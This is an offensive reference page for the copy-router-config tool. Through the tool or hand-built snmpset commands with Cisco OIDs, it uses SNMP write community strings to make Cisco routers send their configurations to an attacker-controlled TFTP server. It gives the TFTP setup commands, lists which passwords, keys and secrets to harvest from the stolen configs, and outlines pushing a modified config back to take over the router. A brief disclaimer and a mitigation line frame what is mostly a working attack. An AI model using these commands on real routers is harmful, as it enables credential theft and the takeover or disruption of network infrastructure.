COPY-ROUTER-CONFIG
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
copy-router-config exploits SNMP write access on Cisco routers to copy the running or startup configuration to a TFTP server. This allows retrieval of router configs including passwords (type 7 encrypted, easily reversible).
BASIC USAGE#
copy-router-config <target> <tftp_server> <community>
# Copy config via SNMP
PREREQUISITES#
# 1. SNMP write access to target router # 2. Known write community string (e.g., "private") # 3. TFTP server running and accessible from router # 4. Network connectivity between router and TFTP server
SETUP TFTP SERVER#
# Start TFTP server on attacker machine: atftpd --daemon --port 69 /tmp/tftp # or in.tftpd -l -s /tmp/tftp # or service tftpd-hpa start # Create writable directory: mkdir -p /tmp/tftp chmod 777 /tmp/tftp touch /tmp/tftp/router-config chmod 666 /tmp/tftp/router-config
USAGE#
# Copy running-config to TFTP copy-router-config <router_ip> <tftp_ip> <community_string> # Example: copy-router-config 192.168.1.1 192.168.1.100 private
MANUAL SNMP METHOD#
# Using snmpset to trigger config copy: # Copy running-config to TFTP: snmpset -v 2c -c <community> <router> \ 1.3.6.1.4.1.9.9.96.1.1.1.1.2.<random> i 1 \ 1.3.6.1.4.1.9.9.96.1.1.1.1.3.<random> i 4 \ 1.3.6.1.4.1.9.9.96.1.1.1.1.4.<random> i 1 \ 1.3.6.1.4.1.9.9.96.1.1.1.1.5.<random> a <tftp_ip> \ 1.3.6.1.4.1.9.9.96.1.1.1.1.6.<random> s <filename> \ 1.3.6.1.4.1.9.9.96.1.1.1.1.14.<random> i 1 # Using older IOS SNMP OID: snmpset -v 1 -c <community> <router> \ .1.3.6.1.4.1.9.2.1.55.<tftp_ip> s <filename>
ANALYZING CONFIGS#
# After downloading config, look for: # - Enable passwords (type 5 = MD5, type 7 = reversible) # - Username/password entries # - SNMP community strings # - VPN/IPSec pre-shared keys # - TACACS+/RADIUS secrets # - Access lists # - Routing protocol keys # - Interface configurations # - VTY line passwords # Decrypt Cisco Type 7 passwords: # Use cisco7decode or online decoders # Type 7 is NOT secure encryption
UPLOAD MODIFIED CONFIG#
# Reverse: upload a modified config to the router # WARNING: Can disrupt network operations! # 1. Modify downloaded config # 2. Place on TFTP server # 3. Use SNMP to trigger copy from TFTP to running-config
NOTES#
- Requires SNMP write community string - SNMP v1/v2c sends community strings in cleartext - Type 7 Cisco passwords are trivially reversible - Type 5 (MD5) passwords require cracking - Type 8/9 (PBKDF2/scrypt) are stronger - Can completely compromise a router - May disrupt network services if config is modified - Only for authorized penetration testing - Mitigate: Use SNMP v3, restrict SNMP access via ACLs